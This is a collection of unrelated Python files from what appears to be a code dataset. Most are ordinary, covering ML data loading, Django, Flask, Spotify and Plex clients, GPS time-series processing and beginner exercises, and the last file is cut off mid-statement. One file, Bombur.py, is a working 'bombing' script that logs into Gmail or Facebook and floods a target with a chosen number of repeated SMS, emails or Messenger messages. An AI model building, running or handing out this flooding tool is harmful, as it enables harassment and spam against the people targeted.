            if self.modality == 'skeleton_2d':
                skeleton_img = skeleton.skeleton_2d(output_size, keypoints_img_new, depth, flip)
                skeleton_img = to_tensor(skeleton_img, self.normalize)
                skeletons.append(skeleton_img)
            elif self.modality == 'skeleton_rgbd':
                # RGB skeleton plus a depth channel stacked on top
                skeleton_img, depth_img = skeleton.skeleton_rgbd(output_size, keypoints_img_new, depth, flip)
                skeleton_img = to_tensor(skeleton_img, self.normalize)
                depth_img = torch.from_numpy(depth_img)
                depth_img = torch.unsqueeze(depth_img, dim=0)
                skeleton_img = torch.cat((skeleton_img, depth_img), dim=0)
                skeletons.append(skeleton_img)
            else:
                raise NotImplementedError()
        # move forward pointer
        self.pos[item] += self.return_count
        # first pair is the target; the rest are stacked as sources
        skeleton_t = skeletons[0]
        image_t = images[0]
        skeletons = torch.stack(skeletons[1:])
        images = torch.stack(images[1:])
        return item, images, skeletons, image_t, skeleton_t
if __name__ == '__main__':
    # testing / visual smoke test: renders frames, skeletons and depth maps
    import matplotlib.pyplot as plt
    image_dir = r'D:\Work\human36m\sampled_images'
    modality = 'skeleton_rgbd'
    return_count = 3
    image_size = 256
    normalize = True
    extend_ratio = 0.2
    random_flip = True
    random_crop = True
    # including the ground truth image
    return_all = return_count + 1
    # NOTE(review): the positional 5 and 2 below land on the `shuffle` and
    # `sample_count` parameters of Human36m; given the defaults
    # keypoint_size=5 and skeleton_width=2 they look misplaced — confirm.
    dataset = Human36m(image_dir, modality, return_all, image_size, normalize, 5, 2,
                       extend_ratio=0.2, random_flip=random_flip, random_crop=random_crop)
    print(len(dataset))
    for i, (item, images, skeletons, image_t, skeleton_t) in enumerate(dataset):
        assert i == item
        assert images.size(0) == return_count
        assert skeletons.size(0) == return_count
        # prepend the target frame/skeleton so all return_all are shown
        image_t = torch.unsqueeze(image_t, dim=0)
        images = torch.cat((image_t, images), dim=0)
        skeleton_t = torch.unsqueeze(skeleton_t, dim=0)
        skeletons = torch.cat((skeleton_t, skeletons), dim=0)
        # image
        skeletons_rgb = skeletons[:, :-1, ...]
        canvas = Image.new('RGB', (return_all * image_size, 3 * image_size), 'white')
        for j in range(return_all):
            # original RGB image
            ii = to_pil_image(images[j], normalize)
            canvas.paste(ii, (j * image_size, 0))
            # RGB skeleton
            ss = to_pil_image(skeletons_rgb[j], normalize)
            canvas.paste(ss, (j * image_size, image_size))
            # skeleton drawn over the original image
            ii_arr = np.array(ii)
            ss_arr = np.array(ss)
            nonzero_pos = np.nonzero(np.sum(ss_arr, axis=-1))
            fused_arr = ii_arr.copy()
            fused_arr[nonzero_pos] = ss_arr[nonzero_pos]
            fused = Image.fromarray(fused_arr)
            canvas.paste(fused, (j * image_size, 2 * image_size))
        plt.clf()
        plt.imshow(canvas)
        plt.show()
        # depth channel, shown side by side per frame
        skeletons_depth = skeletons[:, -1, ...]
        depth_canvas = np.zeros((image_size, return_all * image_size), dtype=np.float32)
        for j in range(return_all):
            depth_canvas[..., j * image_size: (j + 1) * image_size] = skeletons_depth[j].numpy()
        plt.clf()
        plt.imshow(depth_canvas, cmap=skeleton.skeleton_colormap)
        plt.colorbar()
        plt.show()
|
996,615 | c5b514866a5b73a46d5b49819a52c75bfd26a92f | a = "All"
b = " work"
c = " and"
d = " no"
e = " play"
f = " makes"
g = " Jack"
h = " a"
i = " dull"
j = " boy"
# Concatenate the sentence fragments (`a` is defined above this block).
print (a+b+c+d+e+f+g+h+i+j)
print(6 *(1 -2))
# ah, tasty beer
bruce = 6
print(bruce + 4)
# 51 % 24 + 2 -> "5 uur" ("5 o'clock" in Dutch)
x = str(51 % 24 +2)
y = " uur"
print(x+y)
# NOTE(review): input() is being handed 100 as the *prompt* argument, and
# `response` is never used afterwards — a string prompt was probably
# intended; confirm.
response = input(100) #principal amount
|
996,616 | 4d10af56cb39939c35f8e813c6f8e13c13fecbdc | from django.db import models
class Propiedad(models.Model):
    """Django model for a property ('propiedad') listing."""

    name = models.CharField(max_length=50)
    address = models.CharField(max_length=100)
    # Floor area in whole square metres (non-negative small integer).
    square_meters = models.PositiveSmallIntegerField()
    # Contact e-mail associated with the property.
    email = models.EmailField(max_length=50)
|
996,617 | 0315e63470993b4158d5549358ccd318b7888609 | """
1. Create an empty stack called op_stack for keeping operators. Create an empty list for
output.
2. Convert the input infix string to a list by using the string method split.
3. Scan the token list from left to right.
• If the token is an operand, append it to the end of the output list.
• If the token is a left parenthesis, push it on the op_stack.
• If the token is a right parenthesis, pop the op_stack until the corresponding left
parenthesis is removed. Append each operator to the end of the output list.
• If the token is an operator, *, /, +, or −, push it on the op_stack. However, first
remove any operators already on the op_stack that have higher or equal precedence
and append them to the output list.
When the input expression has been completely processed, check the op_stack. Any
operators still on the stack can be removed and appended to the end of the output list.
"""
from Stack import *
def infix_to_postfix(string):
    """Convert a space-delimited infix expression to postfix notation.

    Operands are alphanumeric tokens (generalised from the original's
    single uppercase letters and single digits, whose membership test
    `token in '0123456789'` was a substring check that rejected multi-digit
    numbers).  Supported operators are * / + - and parentheses.  Returns
    the postfix expression as a space-joined string; raises KeyError for
    unknown operator tokens (as before).
    """
    # Operator precedence; '(' is lowest so operators never pop it.
    prec = {"*": 3, "/": 3, "+": 2, "-": 2, "(": 1}
    op_stack = []  # a plain list serves as the operator stack
    postfix_list = []
    for token in string.split():
        if token.isalnum():
            # operand goes straight to the output
            postfix_list.append(token)
        elif token == '(':
            op_stack.append(token)
        elif token == ')':
            # pop until the matching '(' has been removed
            top_token = op_stack.pop()
            while top_token != '(':
                postfix_list.append(top_token)
                top_token = op_stack.pop()
        else:
            # operator: first pop anything of higher or equal precedence
            while op_stack and prec[op_stack[-1]] >= prec[token]:
                postfix_list.append(op_stack.pop())
            op_stack.append(token)
    # drain any remaining operators
    while op_stack:
        postfix_list.append(op_stack.pop())
    # fixed 'Converion' typo in the progress message
    print("String: ", string, "\nConversion: ", end='')
    return " ".join(postfix_list)
#print(infix_to_postfix("( A + B ) * ( C + D )"))
print(infix_to_postfix("( A + B ) * C"))
|
996,618 | 06cf5d30837cdf38998ed15acb4cef488067d374 | import xlsxwriter
# Next worksheet row to write to; row 1 holds the header.
current_row = 2
# Worksheet column letters for each field.
NAME_COLUMN = "A"
LAT_COLUMN = "B"
LNG_COLUMN = "C"
# constant_memory streams rows to disk instead of keeping them all in RAM.
workbook = xlsxwriter.Workbook("data/Kommuners_Koordinater.xlsx", {
    'constant_memory': True
})
worksheet = workbook.add_worksheet()
# Header row.
worksheet.write(f"{NAME_COLUMN}1", "name")
worksheet.write(f"{LAT_COLUMN}1", "lat")
worksheet.write(f"{LNG_COLUMN}1", "lng")
def write_to_file(name, lat, lng):
    """Append one (name, lat, lng) row to the worksheet.

    Uses the module-level worksheet and advances the shared current_row
    counter after writing, so calls must happen before save_file().
    """
    global current_row
    worksheet.write(f"{NAME_COLUMN}{current_row}", name)
    worksheet.write(f"{LAT_COLUMN}{current_row}", lat)
    worksheet.write(f"{LNG_COLUMN}{current_row}", lng)
    current_row += 1
def save_file():
    """Finalise and close the workbook; no rows can be written afterwards."""
    workbook.close()
|
996,619 | 267978e5da11b40fb499e2f0b7380464ad0c913d | from rest_framework.authtoken.models import Token
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.views import APIView
__all__ = ['TokenRetrieveView']
class TokenRetrieveView(APIView):
    """Return the DRF auth token for the authenticated user, creating one
    on first request (get_or_create makes repeated calls idempotent)."""

    permission_classes = (IsAuthenticated,)

    def get(self, request, format=None):
        token, created = Token.objects.get_or_create(user=request.user)
        return Response(data={'key': token.key})
|
996,620 | 6ca98192b617b61dd797b94249962982ccc02462 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import unittest
from lib import executeTestCase
from lib import runner,utils
from lib.launcher import *
from lib.dde_dock import *
result = True
casename = 'all-3356:有道词典开启与关闭'
class YoudaoDict(unittest.TestCase):
    """Desktop UI test: open and close the Youdao Dictionary app
    (case all-3356 / id 83365)."""

    caseid = '83365'

    @classmethod
    def setUpClass(cls):
        cls.appName = 'youdao-dict'
        # Window title is the app's Chinese display name.
        cls.winName = '有道词典'
        cls.oldWindows = getAllWindows()

    @classmethod
    def tearDownClass(cls):
        pass

    def setUp(self):
        pass

    def tearDown(self):
        # Kill every youdao process (excluding the backend daemon and the
        # grep itself) so each test starts from a clean desktop.
        subprocess.check_call("ps aux |grep youdao |grep -v grep |grep -v backend |awk '{print $2}' |xargs kill -9", shell=True)

    def testYoudao1(self):
        # Launch from the shell; the window and its dock entry must appear.
        subprocess.check_call(self.appName + ' &', shell=True)
        winName = getAllWindowNames()
        dockApps = Dock().getAllApps()
        self.assertIn(self.winName,winName)
        self.assertIn(self.winName,dockApps)

    def testYoudao2(self):
        # Launch via the launcher's search box; the window must appear.
        Dock().dockObj.child('Launcher').click()
        launcher.searchApp(self.appName)
        sleep(1)
        pyautogui.press('enter')
        winName = getAllWindowNames()
        self.assertIn(self.winName,winName)
def suite():
    """Build the ordered test suite for the YoudaoDict cases."""
    collected = unittest.TestSuite()
    for case_name in ('testYoudao1', 'testYoudao2'):
        collected.addTest(YoudaoDict(case_name))
    return collected
if __name__ == "__main__":
executeTestCase.runTest(YoudaoDict)
|
996,621 | 4f7f54cb55839c1bc49ee56f30392466cda76d66 | import re
import spotipy
from spotipy.oauth2 import SpotifyClientCredentials
from spotipy.oauth2 import SpotifyOauthError
from playlist.config import settings
class SpotifyService:
    """Thin wrapper around spotipy for reading playlist metadata and tracks."""

    def __init__(self):
        # Prefer credentials resolved from the environment; fall back to the
        # explicit settings values when that flow raises.
        try:
            self.spotify = spotipy.Spotify(
                client_credentials_manager=SpotifyClientCredentials()
            )
        except SpotifyOauthError:
            self.spotify = spotipy.Spotify(
                client_credentials_manager=SpotifyClientCredentials(
                    client_id=settings.SPOTIPY_CLIENT_ID,
                    client_secret=settings.SPOTIPY_CLIENT_SECRET,
                )
            )
        self.fields = settings.get("spotify.playlist.fields")
        self.track_fields = settings.get("spotify.playlist.track.fields")

    def get_playlist_info(self, playlist):
        """Return playlist metadata for a Spotify URI or bare ID.

        Raises ValueError for malformed/missing IDs.
        """
        self._id_validator(playlist)
        info = None
        # NOTE(review): self.pull is never initialised anywhere visible; only
        # the short-circuit on `info is None` (always True here) prevents an
        # AttributeError — confirm what `pull` was meant to control.
        if info is None or self.pull:
            info = self.spotify.playlist(
                playlist_id=playlist, fields=self.fields
            )
        return info

    def get_playlist_tracks(self, playlist):
        """Return the complete (paginated) track list of a playlist."""
        self._id_validator(playlist)
        tracks = []
        # Fix: the paging suffix was previously appended to
        # self.track_fields itself, so it grew again on every call;
        # build the field list in a local instead.
        fields = self.track_fields
        if fields is not None:
            fields += ",next,limit,previous,offset,total"
        if len(tracks) == 0:
            results = self.spotify.playlist_items(
                playlist_id=playlist, fields=fields
            )
            tracks = results["items"]
            while results["next"]:
                results = self.spotify.next(results)
                tracks.extend(results["items"])
        return tracks

    def _id_validator(self, playlist):
        """Raise ValueError unless `playlist` is a Spotify URI or a bare ID."""
        uri_regex = r"spotify:(episode|show|playlist|track|album|artist|user):[a-zA-Z0-9]+"
        id_only_regex = "[a-zA-Z0-9]+"
        if playlist is None:
            raise ValueError(
                "Invalid Spotify ID reason: value can't be None, allowed format: < '%s' >"
                % uri_regex
            )
        # Fix: the original combined the two checks with `or`, which rejected
        # every bare ID (a bare ID never matches the URI pattern).  Accept
        # either form; fullmatch makes the bare-ID check cover the whole
        # string instead of just a prefix.
        if not (re.match(uri_regex, playlist)
                or re.fullmatch(id_only_regex, playlist)):
            raise ValueError(
                "Invalid Spotify ID reason: value does not match pattern: < '%s' >"
                % uri_regex
            )
|
996,622 | baf8f7758323942a41cc0dd00eff91a92f13d5eb | resposta = input('Você deseja adicionar mais nomes a competição?')
dic={}
menor = 10000000000
while resposta != 'sair':
if resposta != 'sair':
a = float(input('Qual a aceleração de cada corredor?'))
dic[resposta] = a
resposta = input('Você deseja adicionar mais nomes a competição?')
tempo = calcula_tempo(dic)
for k,v in tempo.items():
if v < menor:
menor = v
chave = k
print('O vencedor é {} com o tempo de conclusão de {} s'.format(chave,menor))
|
996,623 | 9165e36a9add2486e92aec2aa099ac845c7545c6 | #! python3
__author__ = 'KattStof'
#Bombur.py - a simple email/sms/facebook bombing script
# One Script to rule them all
from colorama import Fore, init
import smtplib, getpass, time
from fbchat import Client
from fbchat.models import *
from GSMS import GSMS
init(convert=True)
print( Fore.YELLOW + """
_______ ______ ___ ___ _______ ____ ____ _______
| _ "\ / " \ |" \ /" || _ "\ (" _||_ " | /" \
(. |_) :) // ____ \ \ \ // |(. |_) :)| ( ) : ||: |
|: \/ / / ) :)/\\ \/. ||: \/ (: | | . )|_____/ )
(| _ \\(: (____/ //|: \. |(| _ \\ \\ \__/ // // /
|: |_) :)\ / |. \ /: ||: |_) :) /\\ __ //\ |: __ \
(_______/ \"_____/ |___|\__/|___|(_______/ (__________)|__| \___)
""")
print(Fore.GREEN + '1) SMS Bomb')
print('2) E-mail Bomb')
print('3) Facebook Bomb')
choice = input("Enter Option: ")
if choice == '1':
mailserver = smtplib.SMTP_SSL('smtp.gmail.com', 465)
mailserver.ehlo()
username = input('Enter Gmail Email Address: ')
password = getpass.getpass()
print(' 1)AT&T \n 2)Verizon \n 3)T-Mobile \n 4)Sprint \n 5)VirginMobile \n 6)USCellular \n 7)Boost')
carrier = input('Enter Phone Carrier: ')
number = input('Enter Phone Number: ')
texttosend = input("Messge to send: ")
ammount = int(input('Number of texts to send: '))
if carrier == '1':
carrier = 'att'
elif carrier == '2':
carrier = 'verizon'
elif carrier == '3':
carrier = 'tmobile'
elif carrier == '4':
carrier = 'sprint'
elif carrier == '5':
carrier = 'virgin'
elif carrier == '6':
carrier = 'uscellular'
elif carrier == '7':
carrier = 'boost'
for x in range(ammount):
time.sleep(2)
GSMS.sms(username, password, number,carrier,texttosend)
print ('Sending text #', x + 1)
print (str(ammount)," Text sent to " ,number, " successfully")
if choice == '2':
mailserver = smtplib.SMTP_SSL('smtp.gmail.com', 465)
mailserver.ehlo()
username = input('Enter Gmail Email Address: ')
password = getpass.getpass()
mailserver.login(username, password)
from_email = input('Enter From Email: ')
to_email = input('Enter Email Address To Bomb:')
subject = input('Enter Email Subject: ')
body = input('Enter Email Body: ')
ammount = int(input('How Many Emails to send?: '))
for i in range(ammount):
print('Sending email #' + str(i + 1))
time.sleep(2)
mailserver.sendmail(from_email, to_email,'Subject:' + subject + '\n' + body)
print(str(ammount),'Emails sent to', to_email, "successfully")
if choice == '3':
fb_email = input('Enter Facebook Email ')
fb_password = input('Enter Facebook Password ')
client = Client(fb_email, fb_password)
user_group = input('are you spamming user or group? ')
if user_group.lower() == 'user':
user_name = input('Name of user to spam ')
users = client.searchForUsers(user_name)
user = users[0]
thread_id = user.uid
message = input('What message to send ')
ammount = int(input('How many messages to send '))
for i in range(ammount):
print('sending message #', i + 1)
client.send(Message(text=message), thread_id=thread_id, thread_type=ThreadType.USER)
print(str(ammount), ' messages sent to ', user_name, ' successfully' )
if user_group.lower() == 'group':
thread_id = input('Enter thread id ex: https://www.facebook.com/messages/t/xxxxx ')
message = input('What message to send ')
ammount = int(input('How many messages to send '))
for i in range(ammount):
print('sending message #', i + 1)
client.send(Message(text=message), thread_id=thread_id, thread_type=ThreadType.GROUP)
print(str(ammount), ' messgaes sent to group successfully ')
|
996,624 | 898d3689c35a436292b27c69bbaa322b2bb46a61 | from flask import Blueprint
from flask import current_app as app
# Blueprint Configuration
# Blueprint for the site's home pages; template and static assets are
# resolved relative to this blueprint's package directory.
home_bp = Blueprint(
    'home_bp', __name__,
    template_folder='templates',
    static_folder='static'
)
996,625 | 107d6c0bed3c2c803a8f7c0c9db32261b030dd2d | """
Some API handling code.
"""
import requests
import syndicate
import syndicate.data
from syndicate.adapters.sync import HeaderAuth
from syndicate.client import ResponseError
xmldecode = syndicate.data.serializers['xml'].decode
# CRAZY DEBUG XXX
def debug():
    """ Turn on wire-level HTTP debugging plus DEBUG logging for the
    requests/urllib3 and websockets loggers.  Module-wide side effects;
    only call when diagnosing traffic. """
    try:
        import http.client as http_client
    except ImportError:
        # Python 2
        import httplib as http_client
    http_client.HTTPConnection.debuglevel = 1
    # You must initialize logging, otherwise you'll not see debug output.
    import logging
    logging.basicConfig()
    logging.getLogger().setLevel(logging.DEBUG)
    requests_log = logging.getLogger("requests.packages.urllib3")
    requests_log.setLevel(logging.DEBUG)
    requests_log.propagate = True
    logger = logging.getLogger('websockets')
    logger.setLevel(logging.DEBUG)
    #logger.addHandler(logging.StreamHandler())
#debug()
# /CRAZY DEBUG XXX
class AuthFailure(SystemExit):
    """ Raised when Plex sign-in fails.  Subclasses SystemExit so an
    uncaught failure exits the CLI with the error text as the message. """
    pass
class PlexAuth(HeaderAuth):
    """ Get the auth token by hitting the sign_in.xml endpoint. """

    token_header = 'X-Plex-Token'

    def __init__(self, api, params, signin):
        self.api = api
        self.params = params
        headers = {"X-Plex-Client-Identifier": 'plexcli'}
        if not params.get('auth_token'):
            # No cached token: fall back to basic auth credentials.
            auth = params['username'], params['password']
        else:
            headers[self.token_header] = params.get('auth_token')
            auth = None
        super().__init__(headers)
        if signin:
            self.signin(auth)

    def signin(self, auth):
        # POST to sign_in.xml; 201 is success, anything else carries
        # <error> elements which we surface via AuthFailure.
        signin = requests.post('%s/users/sign_in.xml' % self.api.uri,
                               auth=auth, headers=self.headers)
        signin_xml = xmldecode(signin.content)
        if signin.status_code != 201:
            errors = [x.text for x in signin_xml.iter('error')]
            raise AuthFailure('\n'.join(errors) or signin.text)
        # Cache the token and identity in the service's persistent state.
        self.api.state['auth'] = auth = {
            "token": signin_xml.attrib['authenticationToken'],
            "username": signin_xml.attrib['username'],
            "email": signin_xml.attrib['email']
        }
        self.headers[self.token_header] = auth['token']
class PlexService(syndicate.Service):
    """ Syndicate-based REST client for a Plex server (XML serializer).

    `state` is an externally supplied dict used to cache auth details
    (see PlexAuth.signin). """

    site = 'https://plex.tv'

    def default_data_getter(self, response):
        # Accept only 200/201; surface transport errors and bad statuses
        # as exceptions so do() can pretty-print them.
        if response.error:
            raise response.error
        elif response.http_code not in (200, 201):
            raise ResponseError(response)
        else:
            return response.content

    def __init__(self, state):
        self.state = state
        super().__init__(uri='<reset_by_connect>', serializer='xml',
                         trailing_slash=False)

    def multi_connect(self, *args, **kwargs):
        """ Try connecting with a list of urls. If none work we abort but
        return to our original state first. """
        uri_save = self.uri
        auth_save = self.adapter.auth
        try:
            self._multi_connect(*args, **kwargs)
        except BaseException as e:
            # Restore the pre-attempt connection state before propagating.
            self.uri = uri_save
            self.adapter.auth = auth_save
            raise e

    def _multi_connect(self, urls, verbose=False, **auth):
        printer = print if verbose else lambda *_, **__: None
        for x in urls:
            printer("Trying connection to %s: " % x, end='', flush=True)
            try:
                self.connect(x, signin=False, **auth)
                self.get(timeout=1)  # Force connection attempt as test.
                printer('SUCCESS')
                break
            except IOError:
                printer('FAIL')
        else:
            # for/else: no URL succeeded.
            raise IOError("ERROR: Could not connect to server(s)")

    def connect(self, uri, signin=True, **auth_params):
        self.uri = uri or self.site
        self.authenticate(auth_params, signin)

    def authenticate(self, params, signin):
        auth = PlexAuth(self, params, signin)
        self.adapter.auth = auth

    def do(self, *args, **kwargs):
        """ Wrap some session and error handling around all API actions. """
        try:
            return super().do(*args, **kwargs)
        except ResponseError as e:
            self.handle_error(e)

    def handle_error(self, error):
        """ Pretty print error messages and exit. """
        html = error.response.content
        raise SystemExit("API Error:\n %s" %
                         "\n ".join(html.itertext()))
|
996,626 | 96fb07f82627a2b93adcfdebce2126af1eaa0aa6 | import datetime
#from profile import profile
from flask import Flask, render_template, url_for
app = Flask(__name__)
@app.route('/')
def home_page():
    """Render the portfolio index with the current year and the
    module-level `profile` dict defined below."""
    year = datetime.datetime.now().year
    return render_template('./index.html', year=year, profile=profile)
@app.route('/<username>/<int:post_id>')
def user_page(username, post_id):
    """Render the index template for a specific user's post."""
    context = {"name": username, "post_id": post_id}
    return render_template('./index.html', **context)
@app.route('/blog')
def blog_page():
    """Placeholder blog landing page (plain-text response)."""
    greeting = 'Welcome to my blog!'
    return greeting
# Static portfolio content consumed by the templates.
# NOTE(review): key casing is inconsistent ('firstName' vs 'lastname') --
# confirm which keys the templates actually read before normalizing.
profile = {
    'firstName': 'Davis',
    'lastname': 'Bickford',
    'name': 'Davis Bickford',
    'jobTitle': 'Software Engineer',
    'aboutme': 'I am a software engineer passionate about solving complex challenges through technical experience, effective communication, collaboration, and a growth mindset.',
    'linkedin': 'in/davisbickford/',
    'linkedinURL': 'https://www.linkedin.com/in/davisbickford/',
    'resumeURL': 'https://drive.google.com/open?id=1rIftYRApheSlJFM68FOvzGL_yvoqHN6B',
    'email': 'davis.bickford@gmail.com',
    'phone': '(303) 947-4291',
    # Each project dict feeds one portfolio card; techList is derived by
    # splitting a comma-separated string.
    'projects': [
        {
            'title': 'PlayBound',
            'image': 'playbound.png',
            'description': "PlayBound is a video game currently in development. I am the sole developer and artist.",
            'description2': "PlayBound tells the story of Kelvin, a boy whose parents have become fatally boring. Strap on your velcro light-up kicks and equip your POG slammers, because it's time to save the world from certain lameness!",
            'techList': 'game development, c#, digital art, unity engine'.split(', '),
            'website': 'http://steam.studiosploot.com/',
            'codeURL': ''
        },
        {
            'title': 'Pug or Not Pug',
            'image': 'pug-or-not-pug.png',
            'description': "Pug or Not Pug is a web application that will determine whether a pug is in a provided image.",
            'description2': "",
            'techList': 'react, machine learning, rest api, node.js, express.js, postgreSQL, sql, html, css, javascript'.split(', '),
            'website': 'https://darnvisages.github.io/pug-or-not-pug/',
            'codeURL': 'https://github.com/darnvisages/pug-or-not-pug'
        },
        {
            'title': 'Parma',
            'image': 'parma.png',
            'description': "Parma is my favorite Italian restaurant, located in Superior, CO. I built their website using React.",
            'description2': "The site features a searchable menu.",
            'techList': 'react, html, css, javascript'.split(', '),
            'website': 'http://www.parmamozzarellabar.com/',
            'codeURL': ''
        },
        {
            'title': 'Portfolio Website',
            'image': 'portfoliosite.png',
            'description': "You're looking at it right now! This portfolio site was built using Flask and Bootstrap.",
            'description2': "",
            'techList': 'python, flask, bootstrap, html, css, javascript'.split(', '),
            'website': 'http://www.davisbickford.com/',
            'codeURL': 'https://github.com/darnvisages/davisbickford-flask-portfolio'
        }
        # Template for a new project entry:
        # {
        #     'title': '',
        #     'image': '',
        #     'description': "",
        #     'description2': "",
        #     'techList': ''.split(', '),
        #     'website': '',
        #     'codeURL': ''
        # ,
    ]
}
# Derived count used by the templates.
profile['project_count'] = len(profile['projects'])
|
996,627 | 7faa7a5087132c3f06f4ad01fe94bc31f77e6725 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2018-07-10 08:27
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Adds an optional free-text "location" field to UserDetails.

    dependencies = [
        ('app', '0003_auto_20180703_1830'),
    ]

    operations = [
        migrations.AddField(
            model_name='userdetails',
            name='location',
            field=models.CharField(blank=True, max_length=250, null=True, verbose_name='Location'),
        ),
    ]
|
996,628 | b575505bea22bded6e7e9d47ed4d702eecf78b75 | # Python viewing to see the Mendocino stations
# Step 1: Determine the stations in the radius.
# Step 2: Read them in. Make a list of timeseries objects in one large dataobject.
# Step 3: Compute: Remove outliers and earthquakes. Then identify
# Step 4: Produce a table and plot of accelerations before/after time ranges.
# Reference:
# Timeseries = collections.namedtuple("Timeseries",['name','coords','dtarray','dN', 'dE','dU','Sn','Se','Su','EQtimes']); # in mm
# Feature: verticals and horizontals at the same time, making two output plots
# Feature: feed seasonal type as parameter, and include that in the output_file name
# This lets us run several experiments.
import numpy as np
import matplotlib.pyplot as plt
import datetime as dt
import glob
import subprocess, sys
import gps_io_functions
import gps_ts_functions
import gps_seasonal_removals
import gps_input_pipeline
import offsets
import stations_within_radius
from Tectonic_Utils.geodesy import haversine
import remove_ets_events
def driver(EQcoords, size, network, refframe, fit_type, deltat1, deltat2, expname, station_list=()):
    """Full pipeline: choose stations, read their data, compute velocity
    changes between the deltat1 and deltat2 windows, and write/plot the
    results."""
    [stations, outdir, time_after_start_date, critical_variance] = configure(EQcoords, fit_type, size, network,
                                                                             refframe, station_list);
    [dataobj_list, offsetobj_list, eqobj_list] = inputs(stations, network, refframe);
    [noeq_objects, east_slope_obj, north_slope_obj, vert_slope_obj] = compute(dataobj_list, offsetobj_list, eqobj_list,
                                                                              deltat1, deltat2, fit_type,
                                                                              time_after_start_date, critical_variance);
    outputs(noeq_objects, east_slope_obj, north_slope_obj, vert_slope_obj, outdir, expname, fit_type, network, refframe,
            deltat1, deltat2, time_after_start_date, critical_variance);
    return;
def configure(EQcoords, fit_type, overall_size, network, refframe, station_list=()):
    """Choose the station set and output directory for this experiment.

    Returns [stations, outdir, time_after_start_date, critical_variance].
    """
    outdir = network + "_" + fit_type + "_" + refframe;
    subprocess.call('mkdir -p ' + outdir, shell=True);
    if network == 'nldas' or network == 'gldas' or network == 'noah025' or network == 'lsdm':
        network = 'pbo';  # This is just for finding which stations we will search for.
    time_after_start_date = 7;  # optionally, wait a while after the start day.
    critical_variance = 5;  # mm/yr. If the time series have a larger variance, we don't consider them
    map_coords = [];
    if overall_size == 'medium':
        radius = 350;  # km.
    elif overall_size == 'huge':
        radius = -1;  # this is a special key for using a coordinate box instead of a radius
        map_coords = [-125.6, -110.0, 32.5, 48.5];
    else:
        radius = 150;
    if len(station_list) > 0:
        # Caller supplied an explicit station list: use it as-is.
        stations = station_list;
    else:
        # Getting the stations of interest ('huge' means we just want within the box.)
        if radius == -1:
            stations, _, _ = stations_within_radius.get_stations_within_box(map_coords, network);
        else:
            stations, _, _, _ = stations_within_radius.get_stations_within_radius(EQcoords, radius, map_coords,
                                                                                  network);
    stations = gps_input_pipeline.remove_blacklist(stations);
    return [stations, outdir, time_after_start_date, critical_variance];
def inputs(station_names, network, refframe):
    """Read time-series, offset, and earthquake objects for each station.

    Stations whose time series cannot be read (falsy result) are dropped
    from all three parallel lists.
    """
    ts_list, offset_list, eq_list = [], [], []
    for name in station_names:
        ts_obj, offset_obj, eq_obj = gps_input_pipeline.get_station_data(name, network, refframe)
        if ts_obj:
            ts_list.append(ts_obj)
            offset_list.append(offset_obj)
            eq_list.append(eq_obj)
    return [ts_list, offset_list, eq_list]
def compute(dataobj_list, offsetobj_list, eqobj_list, deltat1, deltat2, fit_type, time_after_start_date,
            critical_variance):
    """Remove offsets/earthquakes/seasonals from each time series, then
    estimate velocities in the two windows plus the uncertainty of the
    velocity change.  Noisy stations are NaN-ed out (not dropped) so the
    returned lists stay parallel to dataobj_list."""
    dt1_start = dt.datetime.strptime(deltat1[0], "%Y%m%d");
    dt1_end = dt.datetime.strptime(deltat1[1], "%Y%m%d");
    dt2_start = dt.datetime.strptime(deltat2[0], "%Y%m%d");
    dt2_end = dt.datetime.strptime(deltat2[1], "%Y%m%d");
    # No earthquakes objects
    noeq_objects = [];
    east_slope_obj = [];
    north_slope_obj = [];
    vert_slope_obj = [];
    # For the vertical correction.
    names = [];
    coords = [];
    for i in range(len(dataobj_list)):
        names.append(dataobj_list[i].name);
        coords.append(dataobj_list[i].coords);
    # The main processing loop for slopes.
    for i in range(len(dataobj_list)):
        # Remove the earthquakes
        print(names[i]);
        newobj = offsets.remove_offsets(dataobj_list[i], offsetobj_list[i]);
        newobj = offsets.remove_offsets(newobj, eqobj_list[i]);
        if fit_type == 'none':
            newobj = gps_seasonal_removals.make_detrended_ts(newobj, 0, fit_type);  # remove seasonals
        else:
            # Station-specific reservoir corrections applied before the
            # generic seasonal removal.
            if newobj.name == 'P349':
                newobj = gps_seasonal_removals.make_detrended_ts(newobj, 1, 'shasta');
            if newobj.name == 'ORVB':
                newobj = gps_seasonal_removals.make_detrended_ts(newobj, 1, 'oroville');
        if fit_type != 'none':
            newobj = gps_seasonal_removals.make_detrended_ts(newobj, 1, fit_type);  # remove seasonals
        # NOTE: WRITTEN IN JUNE 2019
        # An experiment for removing ETS events
        # if newobj.name in ["P349","P060","P330","P331","P332","P343","P338","P341"]:
        ets_intervals = remove_ets_events.input_tremor_days();
        # newobj=gps_ts_functions.remove_outliers(newobj,3.0);  # 3 mm outlier def.
        # newobj=remove_ets_events.remove_ETS_times(newobj,ets_intervals, offset_num_days=15);  # 30 days on either end of the offsets
        newobj = remove_ets_events.remove_characteristic_ETS(newobj, ets_intervals);  # using only the characteristic offset
        noeq_objects.append(newobj);
        # Get the pre-event and post-event velocities (earthquakes removed)
        [east_slope_before, north_slope_before, vert_slope_before, esig0, nsig0, usig0] = gps_ts_functions.get_slope(
            newobj, starttime=dt1_start + dt.timedelta(days=time_after_start_date), endtime=dt1_end);
        [east_slope_after, north_slope_after, vert_slope_after, esig1, nsig1, usig1] = gps_ts_functions.get_slope(
            newobj, starttime=dt2_start + dt.timedelta(days=time_after_start_date), endtime=dt2_end);
        # Get the uncertainties on the velocity-change estimate
        [east_slope_unc1, north_slope_unc1, vert_slope_unc1] = gps_ts_functions.get_slope_unc(
            newobj, dt1_start + dt.timedelta(days=time_after_start_date), dt1_end);
        [east_slope_unc2, north_slope_unc2, vert_slope_unc2] = gps_ts_functions.get_slope_unc(
            newobj, dt2_start + dt.timedelta(days=time_after_start_date), dt2_end);
        east_dv_unc = gps_ts_functions.add_two_unc_quadrature(east_slope_unc1, east_slope_unc2);
        north_dv_unc = gps_ts_functions.add_two_unc_quadrature(north_slope_unc1, north_slope_unc2);
        vert_dv_unc = gps_ts_functions.add_two_unc_quadrature(vert_slope_unc1, vert_slope_unc2);
        # When do we ignore stations? When their detrended time series have a large variance.
        if abs(esig0) > critical_variance or abs(nsig0) > critical_variance or abs(esig1) > critical_variance or abs(
                nsig1) > critical_variance:
